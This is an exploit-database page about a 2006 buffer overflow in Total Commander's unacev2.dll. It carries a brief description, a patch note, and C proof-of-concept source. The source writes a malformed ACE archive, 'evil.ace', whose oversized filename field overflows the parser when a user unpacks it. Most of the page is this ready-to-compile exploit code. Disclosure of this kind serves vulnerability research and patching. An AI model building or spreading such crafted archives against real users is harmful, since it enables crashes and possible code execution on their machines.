header-logo
Suggest Exploit
vendor:
Total Commander
by:
Darkeagle of Unl0ck Research Team
7,5
CVSS
HIGH
Buffer Overflow
120 (Buffer Copy without Checking Size of Input)
CWE
Product Name: Total Commander
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Total Commander unacev2.dll Buffer Overflow PoC Exploit

This exploit is a proof-of-concept exploit for a buffer overflow vulnerability in Total Commander's unacev2.dll. When the file is created, the user can open the archive in Total Commander and then unpack it. The exploit is written in C and contains an array of malicious data that is written to a file called evil.ace.

Mitigation:

The user should update to the latest version of Total Commander to ensure that the vulnerability is patched.
Source

Exploit-DB raw data:

/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


int main()
{
	FILE *ace;
	ace = fopen("evil.ace", "w+b");
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;

}

// milw0rm.com [2006-04-02]

Navigation

Suggest Exploit

Services By CQR